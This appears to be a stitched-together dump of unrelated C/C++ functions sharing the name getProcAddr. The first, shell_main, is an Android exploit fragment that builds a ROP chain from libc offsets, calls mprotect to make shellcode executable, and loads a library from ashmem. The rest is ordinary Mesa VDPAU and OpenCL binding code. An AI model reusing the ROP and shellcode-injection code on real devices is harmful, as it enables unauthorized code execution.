void shell_main(){
dlopen_t dlopen_f = (dlopen_t)getProcAddr(NULL,"dlopen");
dlsym_t dlsym_f = (dlsym_t)getProcAddr(NULL,"dlsym");
const char *so_name = "/data/local/tmp/testso.so";
char *code = (char*)get_so_buffer(so_name);
int ashmem_len = *(int*)code;
int fd_memory = ashmem_create_region("shmem", ashmem_len);
ashmem_pin_region(fd_memory, 0, 0);
uint8_t *shm = (uint8_t*)mmap(NULL, ashmem_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd_memory, 0);
printf("first map address is %p\n",shm);
memcpy(shm,code,ashmem_len);
free(code);
//ashmem_unpin_region(fd_memory, 0, 0);
int pos[32]={12,2,12,fd_memory};
//shellcode(dlopen_f,pos);
uint32_t libcbase = (uint32_t)getModuleBase("libc.so");
uint32_t mprotect_address = (uint32_t)getProcAddr("libc.so","mprotect");
uint32_t len = 0;
void *buffer = get_shellcode(&len);
uint32_t ropData[29]={libcbase+0x15056+1,1+libcbase+0x4c8ee,0xdeaddead,0xdeaddead,(uint32_t)buffer&0xfffff000,4096,0x7,(uint32_t)mprotect_address,(uint32_t)dlopen_f,(uint32_t)pos,2,(uint32_t)buffer+1};
//uint32_t ropData[29]={libcbase+0x15056+1,1+libcbase+0x4c8ee,0xdeaddead,0xdeaddead,(uint32_t)buffer&0xfffff000,4096,0x7,(uint32_t)mprotect_address,(uint32_t)dlopen_f,1,2,(uint32_t)shellcode};
asmm_test((uint32_t)ropData);
free(buffer);
exit(-1);
}
static struct pipe_resource *
st_vdpau_video_surface_gallium(struct gl_context *ctx, const void *vdpSurface,
GLuint index)
{
int (*getProcAddr)(uint32_t device, uint32_t id, void **ptr);
uint32_t device = (uintptr_t)ctx->vdpDevice;
struct pipe_sampler_view *sv;
VdpVideoSurfaceGallium *f;
struct pipe_video_buffer *buffer;
struct pipe_sampler_view **samplers;
getProcAddr = (void *)ctx->vdpGetProcAddress;
if (getProcAddr(device, VDP_FUNC_ID_VIDEO_SURFACE_GALLIUM, (void**)&f))
return NULL;
buffer = f((uintptr_t)vdpSurface);
if (!buffer)
return NULL;
samplers = buffer->get_sampler_view_planes(buffer);
if (!samplers)
return NULL;
sv = samplers[index >> 1];
if (!sv)
return NULL;
return sv->texture;
}
static struct pipe_resource *
st_vdpau_output_surface_gallium(struct gl_context *ctx, const void *vdpSurface)
{
int (*getProcAddr)(uint32_t device, uint32_t id, void **ptr);
uint32_t device = (uintptr_t)ctx->vdpDevice;
VdpOutputSurfaceGallium *f;
getProcAddr = (void *)ctx->vdpGetProcAddress;
if (getProcAddr(device, VDP_FUNC_ID_OUTPUT_SURFACE_GALLIUM, (void**)&f))
return NULL;
return f((uintptr_t)vdpSurface);
}
cl_int OpenCLManager::clEnqueueNDRangeKernel(cl_command_queue command_queue, cl_kernel kernel, cl_uint work_dim, const size_t *global_work_offset, const size_t *global_work_size, const size_t *local_work_size, cl_uint num_events_in_wait_list, const cl_event *event_wait_list, cl_event *event)
{
if( enqueue_nd_range_kernel_func_ == NULL ){
enqueue_nd_range_kernel_func_ = (PF_CL_ENQUEUE_ND_RANGE_KERNEL) getProcAddr( "clEnqueueNDRangeKernel" );
}
if( enqueue_nd_range_kernel_func_ != NULL){
return enqueue_nd_range_kernel_func_(command_queue,kernel,work_dim,global_work_offset,global_work_size,local_work_size,num_events_in_wait_list,event_wait_list,event);
}else{
qWarning() << "Bind Error: enqueue_nd_range_kernel_func_";
bind_error_ = true;
return 0;
}
}
cl_command_queue OpenCLManager::clCreateCommandQueue(cl_context context, cl_device_id device, cl_command_queue_properties properties, cl_int *errcode_ret)
{
if( create_command_queue_func_ == NULL ){
create_command_queue_func_ = (PF_CL_CREATE_COMMAND_QUEUE) getProcAddr( "clCreateCommandQueue" );
}
if( create_command_queue_func_ != NULL){
return create_command_queue_func_(context,device,properties,errcode_ret);
}else{
qWarning() << "Bind Error: create_command_queue_func_";
bind_error_ = true;
return NULL;
}
}
cl_context OpenCLManager::clCreateContext(const cl_context_properties *properties, cl_uint num_devices, const cl_device_id *devices, void (CL_CALLBACK*pfn_notify)(const char *, const void *, size_t, void *), void *user_data, cl_int *errcode_ret)
{
if( create_context_func_ == NULL ){
create_context_func_ = (PF_CL_CREATE_CONTEXT) getProcAddr( "clCreateContext" );
}
if( create_context_func_ != NULL){
return create_context_func_(properties,num_devices,devices,pfn_notify,user_data,errcode_ret);
}else{
qWarning() << "Bind Error: create_context_func_";
bind_error_ = true;
return NULL;
}
}
cl_int OpenCLManager::clReleaseCommandQueue(cl_command_queue command_queue)
{
if( release_command_queue_func_ == NULL ){
release_command_queue_func_ = (PF_CL_RELEASE_COMMAND_QUEUE) getProcAddr( "clReleaseCommandQueue" );
}
if( release_command_queue_func_ != NULL){
return release_command_queue_func_(command_queue);
}else{
qWarning() << "Bind Error: release_command_queue_func_";
bind_error_ = true;
return 0;
}
}
cl_int OpenCLManager::clGetDeviceIDs(cl_platform_id platform, cl_device_type device_type, cl_uint num_entries, cl_device_id *devices, cl_uint *num_devices)
{
if( get_device_ids_func_ == NULL ){
get_device_ids_func_ = (PF_CL_GET_DEVICE_IDS) getProcAddr( "clGetDeviceIDs" );
}
if( get_device_ids_func_ != NULL){
return get_device_ids_func_(platform,device_type,num_entries,devices,num_devices);
}else{
qWarning() << "Bind Error: get_device_ids_func_";
bind_error_ = true;
return 0;
}
}
cl_program OpenCLManager::clCreateProgramWithSource(cl_context context, cl_uint count, const char **strings, const size_t *lengths, cl_int *errcode_ret)
{
if( create_program_with_source_func_ == NULL ){
create_program_with_source_func_ = (PF_CL_CREATE_PROGRAM_WITH_SOURCE) getProcAddr( "clCreateProgramWithSource" );
}
if( create_program_with_source_func_ != NULL){
return create_program_with_source_func_(context,count,strings,lengths,errcode_ret);
}else{
qWarning() << "Bind Error: create_program_with_source_func_";
bind_error_ = true;
return NULL;
}
}
cl_mem OpenCLManager::clCreateBuffer(cl_context context, cl_mem_flags flags, size_t size, void *host_ptr, cl_int *errcode_ret)
{
if( create_buffer_func_ == NULL ){
create_buffer_func_ = (PF_CL_CREATE_BUFFER) getProcAddr( "clCreateBuffer" );
}
if( create_buffer_func_ != NULL){
return create_buffer_func_(context,flags,size,host_ptr,errcode_ret);
}else{
qWarning() << "Bind Error: create_buffer_func_";
bind_error_ = true;
return NULL;
}
}
cl_int OpenCLManager::clEnqueueWriteBuffer(cl_command_queue command_queue, cl_mem buffer, cl_bool blocking_write, size_t offset, size_t cb, const void *ptr, cl_uint num_events_in_wait_list, const cl_event *event_wait_list, cl_event *event)
{
if( enqueue_write_buffer_func_ == NULL ){
enqueue_write_buffer_func_ = (PF_CL_ENQUEUE_WRITE_BUFFER) getProcAddr( "clEnqueueWriteBuffer" );
}
if( enqueue_write_buffer_func_ != NULL){
return enqueue_write_buffer_func_(command_queue,buffer,blocking_write,offset,cb,ptr,num_events_in_wait_list,event_wait_list,event);
}else{
qWarning() << "Bind Error: enqueue_write_buffer_func_";
bind_error_ = true;
return 0;
}
}
cl_int OpenCLManager::clReleaseKernel(cl_kernel kernel)
{
if( release_kernel_func_ == NULL ){
release_kernel_func_ = (PF_CL_RELEASE_KERNEL) getProcAddr( "clReleaseKernel" );
}
if( release_kernel_func_ != NULL){
return release_kernel_func_(kernel);
}else{
qWarning() << "Bind Error: release_kernel_func_";
bind_error_ = true;
return 0;
}
}
cl_int OpenCLManager::clSetKernelArg(cl_kernel kernel, cl_uint arg_index, size_t arg_size, const void *arg_value)
{
if( set_kerne_arg_func_ == NULL ){
set_kerne_arg_func_ = (PF_CL_SET_KERNEL_ARG) getProcAddr( "clSetKernelArg" );
}
if( set_kerne_arg_func_ != NULL){
return set_kerne_arg_func_(kernel,arg_index,arg_size,arg_value);
}else{
qWarning() << "Bind Error: set_kerne_arg_func_";
bind_error_ = true;
return 0;
}
}
cl_int OpenCLManager::clGetProgramBuildInfo(cl_program program, cl_device_id device, cl_program_build_info param_name, size_t param_value_size, void *param_value, size_t *param_value_size_ret)
{
if( get_program_build_info_func_ == NULL ){
get_program_build_info_func_ = (PF_CL_GET_PROGRAM_BUILD_INFO) getProcAddr( "clGetProgramBuildInfo" );
}
if( get_program_build_info_func_ != NULL){
return get_program_build_info_func_(program,device,param_name,param_value_size,param_value,param_value_size_ret);
}else{
qWarning() << "Bind Error: get_program_build_info_func_";
bind_error_ = true;
return 0;
}
}
cl_kernel OpenCLManager::clCreateKernel(cl_program program, const char *kernel_name, cl_int *errcode_ret)
{
if( create_kernel_func_ == NULL ){
create_kernel_func_ = (PF_CL_CREATE_KERNEL) getProcAddr( "clCreateKernel" );
}
if( create_kernel_func_ != NULL){
return create_kernel_func_(program,kernel_name,errcode_ret);
}else{
qWarning() << "Bind Error: create_kernel_func_";
bind_error_ = true;
return NULL;
}
}
cl_int OpenCLManager::clBuildProgram(cl_program program, cl_uint num_devices, const cl_device_id *device_list, const char *options, void (CL_CALLBACK*pfn_notify)(cl_program, void *), void *user_data)
{
if( build_program_func_ == NULL ){
build_program_func_ = (PF_CL_BUILD_PROGRAM) getProcAddr( "clBuildProgram" );
}
if( build_program_func_ != NULL){
return build_program_func_(program,num_devices,device_list,options,pfn_notify,user_data);
}else{
qWarning() << "Bind Error: enqueue_write_buffer_func_";
bind_error_ = true;
return 0;
}
}
cl_int OpenCLManager::clReleaseProgram(cl_program program)
{
if( release_program_func_ == NULL ){
release_program_func_ = (PF_CL_RELEASE_PROGRAM) getProcAddr( "clReleaseProgram" );
}
if( release_program_func_ != NULL){
return release_program_func_(program);
}else{
qWarning() << "Bind Error: release_program_func_";
bind_error_ = true;
return 0;
}
}
cl_int OpenCLManager::clGetPlatformIDs( cl_uint num_entries, cl_platform_id * platforms, cl_uint * num_platforms )
{
if( platform_id_func_ == NULL ){
platform_id_func_ = (PF_CL_GET_PLATFORM_IDS) getProcAddr( "clGetPlatformIDs" );
}
if( platform_id_func_ != NULL){
return platform_id_func_(num_entries, platforms, num_platforms );
}else{
qWarning() << "Bind Error: platform_id_func_";
bind_error_ = true;
return 0;
}
}
cl_int OpenCLManager::clReleaseMemObject(cl_mem memobj)
{
if( release_mem_object_func_ == NULL ){
release_mem_object_func_ = (PF_CL_RELEASE_MEMOBJECT) getProcAddr( "clReleaseMemObject" );
}
if( release_mem_object_func_ != NULL){
return release_mem_object_func_(memobj);
}else{
qWarning() << "Bind Error: release_mem_object_func_";
bind_error_ = true;
return 0;
}
}
static struct pipe_resource *
st_vdpau_output_surface_dma_buf(struct gl_context *ctx, const void *vdpSurface)
{
int (*getProcAddr)(uint32_t device, uint32_t id, void **ptr);
uint32_t device = (uintptr_t)ctx->vdpDevice;
struct VdpSurfaceDMABufDesc desc;
VdpOutputSurfaceDMABuf *f;
getProcAddr = (void *)ctx->vdpGetProcAddress;
if (getProcAddr(device, VDP_FUNC_ID_OUTPUT_SURFACE_DMA_BUF, (void**)&f))
return NULL;
if (f((uintptr_t)vdpSurface, &desc) != VDP_STATUS_OK)
return NULL;
return st_vdpau_resource_from_description(ctx, &desc);
}
static void
st_vdpau_map_surface(struct gl_context *ctx, GLenum target, GLenum access,
GLboolean output, struct gl_texture_object *texObj,
struct gl_texture_image *texImage,
const GLvoid *vdpSurface, GLuint index)
{
int (*getProcAddr)(uint32_t device, uint32_t id, void **ptr);
uint32_t device = (uintptr_t)ctx->vdpDevice;
struct st_context *st = st_context(ctx);
struct st_texture_object *stObj = st_texture_object(texObj);
struct st_texture_image *stImage = st_texture_image(texImage);
struct pipe_resource *res;
struct pipe_sampler_view *sv, templ;
gl_format texFormat;
getProcAddr = ctx->vdpGetProcAddress;
if (output) {
VdpOutputSurfaceGallium *f;
if (getProcAddr(device, VDP_FUNC_ID_OUTPUT_SURFACE_GALLIUM, (void**)&f)) {
_mesa_error(ctx, GL_INVALID_OPERATION, "VDPAUMapSurfacesNV");
return;
}
res = f((uintptr_t)vdpSurface);
if (!res) {
_mesa_error(ctx, GL_INVALID_OPERATION, "VDPAUMapSurfacesNV");
return;
}
} else {
VdpVideoSurfaceGallium *f;
struct pipe_video_buffer *buffer;
struct pipe_sampler_view **samplers;
if (getProcAddr(device, VDP_FUNC_ID_VIDEO_SURFACE_GALLIUM, (void**)&f)) {
_mesa_error(ctx, GL_INVALID_OPERATION, "VDPAUMapSurfacesNV");
return;
}
buffer = f((uintptr_t)vdpSurface);
if (!buffer) {
_mesa_error(ctx, GL_INVALID_OPERATION, "VDPAUMapSurfacesNV");
return;
}
samplers = buffer->get_sampler_view_planes(buffer);
if (!samplers) {
_mesa_error(ctx, GL_INVALID_OPERATION, "VDPAUMapSurfacesNV");
return;
}
sv = samplers[index >> 1];
if (!sv) {
_mesa_error(ctx, GL_INVALID_OPERATION, "VDPAUMapSurfacesNV");
return;
}
res = sv->texture;
}
if (!res) {
_mesa_error(ctx, GL_INVALID_OPERATION, "VDPAUMapSurfacesNV");
return;
}
/* do we have different screen objects ? */
if (res->screen != st->pipe->screen) {
_mesa_error(ctx, GL_INVALID_OPERATION, "VDPAUMapSurfacesNV");
return;
}
/* switch to surface based */
if (!stObj->surface_based) {
_mesa_clear_texture_object(ctx, texObj);
stObj->surface_based = GL_TRUE;
}
texFormat = st_pipe_format_to_mesa_format(res->format);
_mesa_init_teximage_fields(ctx, texImage,
res->width0, res->height0, 1, 0, GL_RGBA,
texFormat);
pipe_resource_reference(&stObj->pt, res);
pipe_sampler_view_reference(&stObj->sampler_view, NULL);
pipe_resource_reference(&stImage->pt, res);
u_sampler_view_default_template(&templ, res, res->format);
templ.u.tex.first_layer = index & 1;
templ.u.tex.last_layer = index & 1;
templ.swizzle_r = GET_SWZ(stObj->base._Swizzle, 0);
templ.swizzle_g = GET_SWZ(stObj->base._Swizzle, 1);
templ.swizzle_b = GET_SWZ(stObj->base._Swizzle, 2);
templ.swizzle_a = GET_SWZ(stObj->base._Swizzle, 3);
stObj->sampler_view = st->pipe->create_sampler_view(st->pipe, res, &templ);
stObj->width0 = res->width0;
stObj->height0 = res->height0;
stObj->depth0 = 1;
stObj->surface_format = res->format;
_mesa_dirty_texobj(ctx, texObj);
}
